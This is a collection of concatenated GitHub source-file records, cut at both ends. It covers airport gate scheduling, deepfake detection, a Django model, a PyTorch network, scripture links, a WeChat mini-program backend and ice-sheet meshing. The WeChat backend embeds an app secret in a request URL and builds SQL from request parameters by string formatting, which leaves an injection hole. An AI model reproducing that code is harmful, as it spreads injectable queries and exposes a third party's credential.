ii in range(size):\n\t\tnum=0\n\t\tfor jj in range(timetable.shape[0]):\n\t\t\tif timetable[jj][0]<=starttime+ii*5+2.5 and timetable[jj][1]>=starttime+ii*5+2.5:\n\t\t\t\tnum+=1\n\t\tstatistic_time[ii]=num\n\tstatistic_time=statistic_time.reshape(-1,1)\n\tnp.savetxt('save_tempresult/statistic_time.txt',statistic_time,fmt='%d')\n\ndef get_distribution_match(alignmenttable,pucks,gates):\n\tpuck=[]\n\tgate=[]\n\tfor ii in range(alignmenttable.shape[0]):\n\t\tif alignmenttable[ii]!=-1:\n\t\t\tpuck.append(pucks[ii][0])\n\t\t\tgate.append(gates[alignmenttable[ii],0])\n\t\telse:\n\t\t\tpuck.append(pucks[ii][0])\n\t\t\tgate.append('lawn')\n\tpuck=np.array(puck).reshape(-1,1)\n\tgate=np.array(gate).reshape(-1,1)\n\tdistribution_match=np.concatenate((puck,gate),axis=1)\n\treturn distribution_match\n\ndef saveresult(max_distribution_match):\n\tpuckindex=np.argsort(max_distribution_match,axis=0)\n\tmax_distribution_match=max_distribution_match[puckindex[:,0]]\n\t#print(max_distribution_match)\n\tnp.savetxt('save_tempresult/distribution_orderby_selectpuckID.txt',max_distribution_match[:,1],fmt='%s')\n\ndef getNWdistribution(alignment,gates):\n\tWalignednum=0\n\tNalignednum=0\n\tfor ii in range(alignment.shape[0]):\n\t\tif alignment[ii]!=-1:\n\t\t\tif gates[alignment[ii],5]=='W':\n\t\t\t\tWalignednum=Walignednum+1\n\t\t\telif gates[alignment[ii],5]=='N':\n\t\t\t\tNalignednum=Nalignednum+1\n\treturn Walignednum,Nalignednum\n\ndef gate_shiyonglv(alignmenttable,timetable,gates):\n\tTset=[]\n\tSset=[]\n\tgate_time=np.zeros(shape=(gates.shape[0]))\n\tfor ii in alignmenttable:\n\t\tif ii!=-1:\n\t\t\tif gates[ii,1]==('T'):\n\t\t\t\tTset.append(ii)\n\t\t\telif gates[ii,1]==('S'):\n\t\t\t\tSset.append(ii)\n\n\tgate_set=[[] for i in range(gates.shape[0])]\n\tfor ii in range(alignmenttable.shape[0]):\n\t\tif alignmenttable[ii]!=-1:\n\t\t\tgate_set[alignmenttable[ii]].append(ii)\n\t\n\tfor ii in range(gates.shape[0]):\n\t\ttimesum=0\n\t\tfor kk in gate_set[ii]:\n\t\t\tendtime=timetable[kk,1]-45\n\t\t\tstarttime=timetable[kk,0]\n\t\t\tif endtime>2880:\n\t\t\t\tendtime=2880\n\t\t\tif starttime<1440:\n\t\t\t\tstarttime=1440\n\t\t\ttimesum=timesum+(endtime-starttime)\n\t\tgate_time[ii]=timesum\n\tgate_time=gate_time/1440\n\tresult=[]\n\tfor ii in range(gates.shape[0]):\n\t\tresult.append([gates[ii,0],gate_time[ii]])\n\tprint('T Gate use ',len(set(Tset)))\n\tprint('S Gate use ',len(set(Sset)))\n\tnp.savetxt('save_tempresult/gate_shiyonglv.txt',result,fmt='%s')\n\n\nif __name__=='__main__':\n\tbathpath=sys.path[0]\n\tproblem=args.problem\n\tmethod=args.method\n\n\tprocess_data_object=process_data(bathpath)\n\tselectpucks,Gates,selecttickets,Timetable=process_data_object.get_data()\n\tdistribution(Timetable)\n\n\tif method=='greedy':\n\t\tTimecost_index=process_data_object.get_timecost_index(Timetable)\n\t\tselectpucks=selectpucks[Timecost_index]\n\t\tchoosedpucks=np.copy(selectpucks)\n\t\tTimetable=Timetable[Timecost_index]\n\t\tchoosedtimetable=np.copy(Timetable)\n\t\tIndexs=process_data_object.indexof_pucks_gates(choosedpucks,Gates)\n\t\tgreedy_object=greedy_select(choosedpucks,Gates,choosedtimetable,Indexs)\n\t\tgreedy_object.get_result()\n\n\n\telif method=='genetic':\n\t\tTimetable_index=np.argsort(Timetable[:,1])\n\t\tselectpucks=selectpucks[Timetable_index]\n\t\tchoosedpucks=np.copy(selectpucks)\n\t\tTimetable=Timetable[Timetable_index]\n\t\tchoosedtimetable=np.copy(Timetable)\n\t\tIndexs=process_data_object.indexof_pucks_gates(selectpucks,Gates)\n\t\tgenetic_object=evolution(Indexs,choosedpucks,Gates,selecttickets,choosedtimetable,problem)\t\n\t\tgenetic_object.get_result()\n\n\telse:\n\t\tprint('command args error')\n\n\n\n","repo_name":"DreAymi/shumo_F_ditribution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":32113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38204454410","text":"#\n# Social Video Verification\n# Harman Suri, Eleanor Tursman\n# Brown University, 2020\n#\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.decomposition import PCA\nfrom sklearn.covariance import MinCovDet\nfrom scipy.cluster.hierarchy import linkage, fcluster\nfrom pywt import wavedec2, dwt_max_level\n\ndef mahalanobis_calculate(data, num_pcs):\n pca = PCA(num_pcs)\n T = pca.fit_transform(data)\n # fit a Minimum Covariance Determinant (MCD) robust estimator to data \n robust_cov = MinCovDet().fit(T)\n # Get the Mahalanobis distance\n m = robust_cov.mahalanobis(T)\n return m\n\n# numFakes will be the number of\n# fakes detected, and c will be a vector of numCams integers, which are \n# partitioned into two sets. We assume the larger partition is real.\n\ndef detectFakesTree(link, thresh):\n \n ratio = link[-1][-2] / link[-2][-2]\n if ratio > thresh:\n c = fcluster(link, 2,criterion='maxclust')\n partition1 = len(np.argwhere(c==1))\n partition2 = len(np.argwhere(c==2))\n if (partition1 > partition2):\n numFakes = partition2\n else:\n numFakes = partition1\n else:\n numFakes = 0\n c = 0\n return numFakes, c\n\n\ndef resultsHelper(numFakes, cLst, result):\n if numFakes[0] == 0:\n result[0][0] = 1\n \n if numFakes[1] == 1:\n if (np.all(cLst[0] == np.array([1,1,1,2,1,1])) or np.all(cLst[0] == np.array([2,2,2,1,2,2]))):\n result[0][1] = 1\n \n if numFakes[2] == 2:\n if (np.all(cLst[1] == np.array([1,1,2,2,1,1])) or np.all(cLst[1] == np.array([2,2,1,1,2,2]))):\n result[0][2] = 1\n \n if numFakes[3] == 3:\n if (np.all(cLst[2] == np.array([1,2,2,2,1,1])) or np.all(cLst[2] == np.array([2,1,1,1,2,2]))):\n result[0][3] = 1\n return result\n\n\n\ndef clusterHelper(X0, X1, X2, X3, thresh, result):\n #Test for tracking failures and remove\n badInds = []\n \n for i, row in enumerate(X0.T):\n if np.max(row) >= 10:\n badInds.append(i)\n \n X0 = np.delete(X0, badInds, axis = 1)\n X1 = np.delete(X1, badInds, axis = 1)\n X2 = np.delete(X2, badInds, axis = 1)\n X3 = np.delete(X3, badInds, axis = 1)\n \n #generate the linkage matrices with euclidean metric, we will cluster data ourselves\n link0 = linkage(X0)\n link1 = linkage(X1)\n link2 = linkage(X2)\n link3 = linkage(X3)\n \n numFakes0, _ = detectFakesTree(link0, thresh)\n numFakes1, c1 = detectFakesTree(link1, thresh)\n numFakes2, c2 = detectFakesTree(link2, thresh)\n numFakes3, c3 = detectFakesTree(link3, thresh)\n \n return resultsHelper([numFakes0, numFakes1, numFakes2, numFakes3], [c1,c2,c3], result)\n \n \ndef createDecompVector(coeff):\n output = []\n for i in range(len(coeff)):\n for j in range(len(coeff[i])):\n output.append(coeff[i][j].flatten())\n return np.hstack(output)\n\ndef socialVerificationNoPCA(data2,data3,data4, thresh):\n result = np.zeros((1,4))\n fullLen = min(data2['cam1'].shape[0], data3['cam1'].shape[0], data4['cam1'].shape[0])\n \n level = dwt_max_level(fullLen, 'haar')\n \n cam1_dist = createDecompVector(wavedec2(data2['cam1'][:fullLen,:], level = level, wavelet ='haar'))\n cam2_dist = createDecompVector(wavedec2(data2['cam2'][:fullLen,:], level = level, wavelet ='haar'))\n cam3_dist = createDecompVector(wavedec2(data2['cam3'][:fullLen,:], level = level, wavelet ='haar'))\n cam4_dist = createDecompVector(wavedec2(data2['cam4'][:fullLen,:], level = level, wavelet ='haar'))\n cam5_dist = createDecompVector(wavedec2(data2['cam5'][:fullLen,:], level = level, wavelet ='haar'))\n cam6_dist = createDecompVector(wavedec2(data2['cam6'][:fullLen,:], level = level, wavelet ='haar'))\n fake2_dist = createDecompVector(wavedec2(data2['fake'][:fullLen,:], level = level, wavelet ='haar'))\n fake3_dist = createDecompVector(wavedec2(data3['fake'][:fullLen,:], level = level, wavelet ='haar'))\n fake4_dist = createDecompVector(wavedec2(data4['fake'][:fullLen,:], level = level, wavelet ='haar'))\n \n X0 = np.array([cam1_dist, cam2_dist, cam3_dist, cam4_dist, cam5_dist, cam6_dist])\n X1 = np.array([cam1_dist, cam2_dist, cam3_dist, fake4_dist, cam5_dist, cam6_dist])\n X2 = np.array([cam1_dist, cam2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n X3 = np.array([cam1_dist, fake2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n \n return clusterHelper(X0, X1, X2, X3, thresh, result)\n \n\n\n\n\ndef socialVerificationOnlyPCA(data2,data3,data4, thresh, num_pcs):\n #storing the accuracy for the 0,1,2,3 fake cases\n result = np.zeros((1,4))\n fullLen = min(data2['cam1'].shape[0], data3['cam1'].shape[0], data4['cam1'].shape[0])\n \n cam1_dist = mahalanobis_calculate(data2['cam1'][:fullLen,:], num_pcs)\n cam2_dist = mahalanobis_calculate(data2['cam2'][:fullLen,:], num_pcs)\n cam3_dist = mahalanobis_calculate(data2['cam3'][:fullLen,:], num_pcs)\n cam4_dist = mahalanobis_calculate(data2['cam4'][:fullLen,:], num_pcs)\n cam5_dist = mahalanobis_calculate(data2['cam5'][:fullLen,:], num_pcs)\n cam6_dist = mahalanobis_calculate(data2['cam6'][:fullLen,:], num_pcs)\n fake2_dist = mahalanobis_calculate(data2['fake'][:fullLen,:], num_pcs)\n fake3_dist = mahalanobis_calculate(data3['fake'][:fullLen,:], num_pcs)\n fake4_dist = mahalanobis_calculate(data4['fake'][:fullLen,:], num_pcs)\n \n \n X0 = np.array([cam1_dist, cam2_dist, cam3_dist, cam4_dist, cam5_dist, cam6_dist])\n X1 = np.array([cam1_dist, cam2_dist, cam3_dist, fake4_dist, cam5_dist, cam6_dist])\n X2 = np.array([cam1_dist, cam2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n X3 = np.array([cam1_dist, fake2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n \n return clusterHelper(X0, X1, X2, X3, thresh, result)\n \n \n \n\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='DeepFake Detection Experiment')\n\n parser.add_argument('--data-dir', type=str, default='Data',\n help='Directory where processed landmark files live')\n parser.add_argument('--num_pcs', type=int, default=5,\n help='Number of principal components to use')\n parser.add_argument('--threshold', type=float, default=1.3,\n help='Cluster threshold')\n parser.add_argument('--num_participants', type=int, default=25,\n help='Number of participants')\n \n \n args = parser.parse_args()\n return args\n\n\n\n\ndef main():\n args = parse_args()\n \n # There is no data for ID 17\n if args.num_participants >= 17:\n averagePCA = np.zeros((args.num_participants-1, 4))\n averageSimple = np.zeros((args.num_participants-1, 4))\n else:\n averagePCA = np.zeros((args.num_participants, 4))\n averageSimple = np.zeros((args.num_participants, 4))\n \n \n for i in range(args.num_participants):\n \n # There is no data for ID 17\n if i == 16:\n continue\n \n \n data2 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake2-ID{i+1}.mat'))\n data3 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake3-ID{i+1}.mat'))\n data4 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake4-ID{i+1}.mat'))\n \n resultPCA = socialVerificationOnlyPCA(data2,data3,data4,args.threshold, args.num_pcs)\n \n resultSimple = socialVerificationNoPCA(data2,data3,data4, args.threshold)\n \n print(f'Iteration: {i+1}. PCA Result: {resultPCA}')\n print(f'Iteration: {i+1}. SimpleMethod Result: {resultSimple}')\n \n # There is no data for ID 17\n if i > 16:\n averagePCA[i-1] = resultPCA\n averageSimple[i-1] = resultSimple\n \n else:\n averagePCA[i] = resultPCA\n averageSimple[i] = resultSimple\n \n print(f'Average accuracy PCA: {np.mean(averagePCA, axis = 0)}')\n print(f'Average accuracy No PCA: {np.mean(averageSimple, axis = 0)}')\n\n\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"brownvc/social-video-verification-hackathon","sub_path":"code/full_sequence_exp.py","file_name":"full_sequence_exp.py","file_ext":"py","file_size_in_byte":8158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73694609424","text":"\"\"\"Abstract model for connections.\"\"\"\nfrom typing import Dict\n\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom ontask.models.common import NameAndDescription\nfrom ontask.models.logs import Log\n\n\nclass Connection(NameAndDescription):\n \"\"\"Model representing a connection to a data source.\n\n @DynamicAttrs\n \"\"\"\n\n # Boolean that enables the use of this connection to other users.\n enabled = models.BooleanField(\n default=False,\n verbose_name=_('Available to users?'),\n null=False,\n blank=False)\n\n optional_fields = []\n\n @classmethod\n def get(cls, primary_key):\n \"\"\"Get the object with the given PK. Must be overwritten.\"\"\"\n raise NotImplementedError\n\n def __str__(self):\n \"\"\"Render with name field.\"\"\"\n return self.name\n\n def has_missing_fields(self) -> bool:\n \"\"\"Check if the connection has any parameter missing\"\"\"\n return any(\n not bool(getattr(self, field_name))\n for field_name in self.optional_fields)\n\n def get_missing_fields(self, form_values: Dict) -> Dict:\n \"\"\"Get the missing fields from the given form\"\"\"\n to_return = {}\n for fname in self.optional_fields:\n to_return[fname] = getattr(self, fname)\n if not to_return[fname]:\n to_return[fname] = form_values[fname]\n return to_return\n\n def get_display_dict(self) -> Dict:\n \"\"\"Create dictionary with (verbose_name, value)\"\"\"\n return {\n self._meta.get_field(key.name).verbose_name.title():\n self.__dict__[key.name]\n for key in self._meta.get_fields()\n if key.name != 'id'}\n\n def log(self, user, operation_type: str, **kwargs) -> int:\n \"\"\"Function to register an event.\"\"\"\n return Log.objects.register(\n self,\n user,\n operation_type,\n None,\n kwargs)\n\n class Meta:\n \"\"\"Define as abstract and the ordering criteria.\"\"\"\n\n abstract = True\n ordering = ['name']\n","repo_name":"abelardopardo/ontask_b","sub_path":"ontask/models/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"37412739056","text":"import torch\r\nfrom torch import nn\r\nimport efficient\r\nfrom torchsummary import summary\r\n\r\n'''\r\n 基础模块定义\r\n'''\r\n\r\n\r\nclass VggBlock(nn.Module):\r\n def __init__(self, in_ch, out_ch, num_lay):\r\n super(VggBlock, self).__init__()\r\n net = []\r\n for i in range(num_lay):\r\n if i == 0:\r\n net.append(\r\n nn.Conv3d(in_channels=in_ch, out_channels=out_ch, kernel_size=(1, 3, 3), stride=(1, 1, 1),\r\n padding=(0, 1, 1))\r\n )\r\n else:\r\n net.append(\r\n nn.Conv3d(in_channels=out_ch, out_channels=out_ch, kernel_size=(1, 3, 3), stride=(1, 1, 1),\r\n padding=(0, 1, 1))\r\n )\r\n net.append(nn.BatchNorm3d(out_ch))\r\n net.append(nn.ReLU(inplace=True))\r\n net.append(\r\n nn.MaxPool3d(kernel_size=(1, 2, 2), padding=(0, 0, 0), stride=(1, 2, 2), ceil_mode=False)\r\n )\r\n self.vgg_block = nn.Sequential(*net)\r\n\r\n def forward(self, x):\r\n return self.vgg_block(x)\r\n\r\n\r\nclass Vgg193d_contour(nn.Module):\r\n def __init__(self):\r\n super(Vgg193d_contour, self).__init__()\r\n self.block1 = VggBlock(in_ch=1, out_ch=64, num_lay=1)\r\n self.block2 = VggBlock(in_ch=64, out_ch=128, num_lay=1)\r\n self.block3 = VggBlock(in_ch=128, out_ch=256, num_lay=1)\r\n self.block4 = VggBlock(in_ch=256, out_ch=512, num_lay=1)\r\n self.block5 = VggBlock(in_ch=512, out_ch=512, num_lay=1)\r\n\r\n def forward(self, x):\r\n out1 = self.block1(x)\r\n out2 = self.block2(out1)\r\n out3 = self.block3(out2)\r\n out4 = self.block4(out3)\r\n out5 = self.block5(out4)\r\n return out1, out2, out3, out4, out5\r\n\r\n\r\nclass Vgg193d_space(nn.Module):\r\n def __init__(self):\r\n super(Vgg193d_space, self).__init__()\r\n self.block1 = VggBlock(in_ch=3, out_ch=64, num_lay=2)\r\n self.block2 = VggBlock(in_ch=64, out_ch=128, num_lay=2)\r\n self.block3 = VggBlock(in_ch=128, out_ch=256, num_lay=3)\r\n self.block4 = VggBlock(in_ch=256, out_ch=512, num_lay=3)\r\n self.block5 = VggBlock(in_ch=512, out_ch=512, num_lay=3)\r\n\r\n def forward(self, x):\r\n out1 = self.block1(x)\r\n out2 = self.block2(out1)\r\n out3 = self.block3(out2)\r\n out4 = self.block4(out3)\r\n out5 = self.block5(out4)\r\n return out5\r\n\r\n\r\nclass Channel_Attention(nn.Module):\r\n def __init__(self):\r\n super(Channel_Attention, self).__init__()\r\n self.sig = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n attention = self.sig(torch.mean(x, dim=(2, 3))).unsqueeze(-1).unsqueeze(-1).expand(x.shape)\r\n return attention\r\n\r\n\r\nclass model_Efficient(nn.Module):\r\n def __init__(self, in_channels):\r\n super(model_Efficient, self).__init__()\r\n self.effect = efficient.efficientnetv2_l()\r\n\r\n def forward(self, x):\r\n return self.effect(x)\r\n\r\n\r\nclass Vgg193d_contour_space(nn.Module):\r\n def __init__(self):\r\n super(Vgg193d_contour_space, self).__init__()\r\n self.vgg_contour = Vgg193d_contour()\r\n self.block1 = VggBlock(in_ch=3, out_ch=64, num_lay=2)\r\n self.block2 = VggBlock(in_ch=64, out_ch=128, num_lay=2)\r\n self.block3 = VggBlock(in_ch=128, out_ch=256, num_lay=4)\r\n self.block4 = VggBlock(in_ch=256, out_ch=512, num_lay=4)\r\n self.block5 = VggBlock(in_ch=512, out_ch=512, num_lay=4)\r\n\r\n def forward(self, x_contour, x_face):\r\n out1_c, out2_c, out3_c, out4_c, out5_c = self.vgg_contour(x_contour)\r\n out1 = self.block1(x_face)\r\n out2 = self.block2(out1 + out1_c)\r\n out3 = self.block3(out2 + out2_c)\r\n out4 = self.block4(out3 + out3_c)\r\n out5 = self.block5(out4 + out4_c)\r\n out = out5 + out5_c\r\n return out.permute((0, 2, 1, 3, 4))\r\n\r\n\r\n'''\r\n 模型组合\r\n'''\r\n\r\n\r\nclass vgg193d_lstm(nn.Module):\r\n def __init__(self, in_channels):\r\n super(vgg193d_lstm, self).__init__()\r\n self.vgg_space = Vgg193d_contour_space()\r\n self.lstm = nn.LSTM(input_size=512 * 3 * 3, hidden_size=1000, num_layers=3, batch_first=True,\r\n bidirectional=False, dropout=0.3)\r\n self.outLay_lstm = nn.Sequential(\r\n nn.Flatten(),\r\n nn.Linear(1000 * in_channels, 1000)\r\n )\r\n self.TemporalAttention = nn.Sequential(\r\n nn.Linear(8, 4),\r\n nn.ReLU(),\r\n nn.Linear(4, 8)\r\n )\r\n self.sig = nn.Sigmoid()\r\n\r\n def forward(self, x_contour, x_face):\r\n out_vgg = self.vgg_space(x_contour, x_face)\r\n b, t, c, w, h = out_vgg.shape\r\n out_vgg = out_vgg.reshape((b, t, -1))\r\n time_attention = torch.mean(out_vgg, dim=2)\r\n time_attention = self.sig(self.TemporalAttention(time_attention))\r\n out_vgg = time_attention.unsqueeze(2).expand(out_vgg.shape) * out_vgg\r\n out, (c, h) = self.lstm(out_vgg)\r\n # out = time_attention.expand(out.shape) * out\r\n return self.outLay_lstm(out)\r\n\r\n\r\nclass vgg193d_LSTM_Efficient(nn.Module):\r\n def __init__(self, in_channels):\r\n super(vgg193d_LSTM_Efficient, self).__init__()\r\n self.STNet = vgg193d_lstm(in_channels=in_channels)\r\n self.FTNet = model_Efficient(in_channels=in_channels)\r\n self.outLay = nn.Sequential(\r\n nn.Linear(2000, 1000),\r\n nn.ReLU(),\r\n nn.Linear(1000, 2)\r\n )\r\n\r\n def forward(self, X):\r\n x_contour, x_face = X[:, 3, :, :, :].unsqueeze(1), X[:, 0:3, :, :, :]\r\n b, c, t, h, w = x_face.shape\r\n out_STNet = self.STNet(x_contour, x_face)\r\n out_FTNet = self.FTNet(x_face.reshape((b, t * c, w, h)))\r\n print(out_STNet.shape)\r\n print(out_FTNet.shape)\r\n return self.outLay(torch.cat((out_STNet, out_FTNet), dim=1))\r\n\r\n\r\nif __name__ == '__main__':\r\n a = torch.randn((4, 4, 8, 112, 112))\r\n net = vgg193d_LSTM_Efficient(in_channels=8)\r\n b = net(a)\r\n print(net)\r\n print(b.shape)\r\n summary(net, a)\r\n","repo_name":"muzixingyun/SFTNet","sub_path":"SFTNet/SFTNet.py","file_name":"SFTNet.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"72307821906","text":"from .cite import join_nums_and_pairs\n\n\ncojesuschrist_base = 'https://www.churchofjesuschrist.org/study/scriptures/'\n\n\ndef embed_html(ref, inner):\n return f'
{inner}'\n\n\ndef embed_markdown(ref, inner):\n return f'[{inner}]({ref})'\n\n\ndef make_churchofjesuschrist(book, chapter, verses):\n book_slug = book.slug.lower().replace(' ', '-').replace('&', '')\n if verses:\n first_verse_item = verses[0]\n first_verse = first_verse_item if isinstance(first_verse_item, int) else first_verse_item[0]\n fragment = '#p%d' % (first_verse - 1) if first_verse > 1 else ''\n verses = '.' + join_nums_and_pairs(verses, ',')\n else:\n verses = fragment = ''\n return f'{cojesuschrist_base}{book.collection_key}/{book_slug}/{chapter}{verses}?lang=eng{fragment}'\n\n\ndef make_short_ref(book, chapter, verses):\n verses = ':' + join_nums_and_pairs(verses, ', ') if verses else ''\n return f'{book.slug} {chapter}{verses}'\n\n\ndef make_long_ref(book, chapter, verses):\n verses = ':' + join_nums_and_pairs(verses, ', ') if verses else ''\n return f'{book.title} {chapter}{verses}'\n\n\n# ------------ keep this block vvv at the bottom of the module --------------\n\n# We want this at the bottom of the module because it uses python reflection\n# to scan all the code that precedes it, and builds a list of all the functions\n# that match a certain pattern. This allows us to add new citation styles by\n# simply adding the relevant functions above, without manually updating a list\n# of the styles we have.\ng = globals()\nall_makers = [key for key in g.keys() if key.startswith('make_') and callable(g[key])]\ndel g\n\n\ndef print_all(book, chapter, verses):\n g = globals()\n for key in all_makers:\n print(key[5:].replace('_', ' '))\n func = g[key]\n print(' %s\\n' % func(book, chapter, verses))\n\n print('html\\n ' + embed_html(make_churchofjesuschrist(book, chapter, verses),\n make_short_ref(book, chapter, verses)) + '\\n')\n print('markdown\\n ' + embed_markdown(make_churchofjesuschrist(book, chapter, verses),\n make_short_ref(book, chapter, verses)) + '\\n')\n\n# ------------ keep this block ^^^ at the bottom of the module --------------\n","repo_name":"dhh1128/cite2link","sub_path":"cite2link/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42557339839","text":"# _*_ coding:utf-8 _*_\nfrom __future__ import print_function\nfrom baseresource.greenresource import BaseResource\nfrom lxml import etree\nimport random\nimport logging\nfrom config.default import appId\nfrom WXBizDataCrypt import WXBizDataCrypt\nimport json\nimport requests\nfrom common.function import timestamp_to_date, get_day\nfrom database.mysql import MysqlDB\nimport ujson\n\n\nclass AuthWeiXin(BaseResource):\n\n back_data = [\"我是智能\", \"你好\", \"你是\"]\n data_length = 0\n def __init__(self, back_data):\n BaseResource.__init__(self)\n self.back_data = back_data\n self.data_length = len(self.back_data)\n def real_POST(self, request):\n receiveData = request.content.read() #获取微信发送过来的body\n print(receiveData)\n data = etree.fromstring(receiveData)\n ToUserName = data.find('ToUserName').text\n FromUserName = data.find('FromUserName').text\n CreateTime = data.find('CreateTime').text\n Content = data.find('Content').text\n print(Content)\n Content = self.back_data[random.randint(0,self.data_length-1)]\n Content = Content.strip('\\n')\n # print(receiveData)\n message = '%s'%(FromUserName, ToUserName, CreateTime, Content)\n print(message)\n return message\n def real_GET(self, request):\n try:\n echostr = request.args.get('echostr')[0]\n return echostr\n except Exception as e:\n logging.info(\"访问错误\")\n print(\"微信验证失败\")\n return \"非法访问\"\n\nclass WXRunData(BaseResource):\n\n def real_POST(self, request):\n nickName = request.args.get('nickName')[0]\n rundata = request.args.get('rundata')[0]\n code = request.args.get('code')[0]\n avatarUrl = request.args.get('avatarUrl')[0]\n logging.info(avatarUrl)\n iv = request.args.get('iv')[0]\n logging.info('iv=%s' % iv)\n url = 'https://api.weixin.qq.com/sns/jscode2session?appid=%s&secret=ddf03c948cfe2610dd8d1ae125b212ea&' \\\n 'js_code=%s&grant_type=authorization_code' % (appId, code)\n res = requests.get(url)\n logging.info(res.content)\n content = json.loads(res.content)\n sessionKey = content['session_key']\n openid = content['openid']\n logging.info(sessionKey)\n pc = WXBizDataCrypt(appId, sessionKey)\n logging.info(\"rundata = %s\" % rundata)\n data = pc.decrypt(rundata, iv)\n for item in data:\n timestamp = timestamp_to_date(item['timestamp'])\n step = item['step']\n logging.info(\"%s %s \" % (timestamp, step))\n run_day = get_day(item['timestamp'])\n logging.info(\"insert into rundata(openid,step,runday,nickname) value\"\n \" ('%s',%s,'%s','%s') on DUPLICATE key update step=%s , avatarUrl='%s'\" % (openid, step,run_day, nickName, step, avatarUrl))\n MysqlDB.insert(\n \"insert into rundata(openid,step,runday,nickname) value\"\n \" ('%s',%s,'%s','%s') on DUPLICATE key update step=%s , avatarUrl='%s'\" % (openid, step,run_day, nickName, step, avatarUrl))\n\n logging.info(\"nickname = %s\" % nickName)\n resp = {'openid': openid, 'code': 0}\n return resp\n def real_GET(self, request):\n nickName = request.args.get('nickName')[0]\n rundata = request.args.get('rundata')[0]\n code = request.args.get('sessionKey')[0]\n\n iv = request.args.get('iv')[0]\n logging.info('iv=%s' % iv)\n url = 'https://api.weixin.qq.com/sns/jscode2session?appid=%s&secret=ddf03c948cfe2610dd8d1ae125b212ea&' \\\n 'js_code=%s&grant_type=authorization_code' % (appId, code)\n res = requests.get(url)\n content = json.loads(res.content)\n sessionKey = content['session_key']\n pc = WXBizDataCrypt(appId, sessionKey)\n data = pc.decrypt(rundata, iv)\n for item in data:\n timestamp = timestamp_to_date(item['timestamp'])\n step = item['step']\n logging.info(\"%s %s \" %(timestamp, step))\n logging.info(\"nickname %s\" % nickName)\n logging.info(nickName)\n return \"success\"","repo_name":"HSATAN/xiaochengxu","sub_path":"api/weixin/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21315706362","text":"class UndergroundSystem:\n\n def __init__(self):\n self.checkin = {}\n self.traveltimes = {} \n\n def checkIn(self, id: int, stationName: str, t: int) -> None:\n self.checkin[id] = (stationName , t)\n\n def checkOut(self, id: int, stationName: str, t: int) -> None:\n startstation , starttime = self.checkin[id]\n traveltime = t - starttime\n key = (startstation , stationName)\n if key in self.traveltimes:\n totaltime , count = self.traveltimes[key]\n self.traveltimes[key] = (totaltime + traveltime , count +1)\n else:\n self.traveltimes[key] = (traveltime , 1)\n del self.checkin[id]\n\n def getAverageTime(self, startStation: str, endStation: str) -> float:\n key = (startStation , endStation)\n totaltime , count = self.traveltimes[key]\n return totaltime / count\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\n# obj = UndergroundSystem()\n# obj.checkIn(id,stationName,t)\n# obj.checkOut(id,stationName,t)\n# param_3 = obj.getAverageTime(startStation,endStation)","repo_name":"AkRockBoy/Leetcode-Solutions","sub_path":"1396-design-underground-system/1396-design-underground-system.py","file_name":"1396-design-underground-system.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43700676006","text":"from cslvr import *\n\n# directories for loading or saving data :\nmsh_dir = './dump/meshes/' # directory where the mesh is located\nout_dir = './dump/vars/' # directory to save initialization\n\nthklim = 1.0 # [m] thickness limit\nL = 800000.0 # [m] mesh radius\nRel = 450000 # [m] radial distance at which S_ring becomes negative\ns = 1e-5 # [a^{-1}] accumulation/ablation coefficient\nTmin = 238.15 # [K] minimum temperature (located at divide)\nSt = 1.67e-5 # [K m^{-1}] lapse rate\n\n# load the mesh that was generated by gen_cylinder.py :\nmesh = Mesh(msh_dir + 'cylinder_mesh.xml.gz')\n\n# these are the mesh attributes which we use to deform :\nxmin = -L\nxmax = L\nymin = -L\nymax = L\n\n# width and origin of the domain for deforming x coord :\nwidth_x = xmax - xmin\noffset_x = xmin\n\n# width and origin of the domain for deforming y coord :\nwidth_y = ymax - ymin\noffset_y = ymin\n\n# iterate through the mesh coordinates and alter the horizontal components :\nfor x in mesh.coordinates():\n x[0] = x[0] * width_x # transform x\n x[1] = x[1] * width_y # transform y\n\n# initialize the model :\nmodel = D3Model(mesh, out_dir=out_dir, use_periodic=False)\n\n# form the 2D upper-surface mesh :\nmodel.form_srf_mesh()\n\n# form a 2D model using the upper-surface mesh :\nsrfmodel = D2Model(model.srfmesh,\n out_dir = out_dir,\n use_periodic = False,\n kind = 'submesh')\n\n# generate the map between the 3D and 2D models :\nmodel.generate_submesh_to_mesh_map(sub_model=srfmodel)\n\nfrom cslvr import *\n\n# set the output directory :\nin_dir = './vars/'\nmsh_dir = './meshes/'\nout_dir = in_dir\n\n# retrieve the domain contour\ncontour = np.loadtxt(msh_dir + 'contour.txt')\n\nf = HDF5File(mpi_comm_world(), in_dir + 'state.h5', 'r')\nfn = HDF5File(mpi_comm_world(), in_dir + 'submeshes.h5', 'w')\n\nmodel = 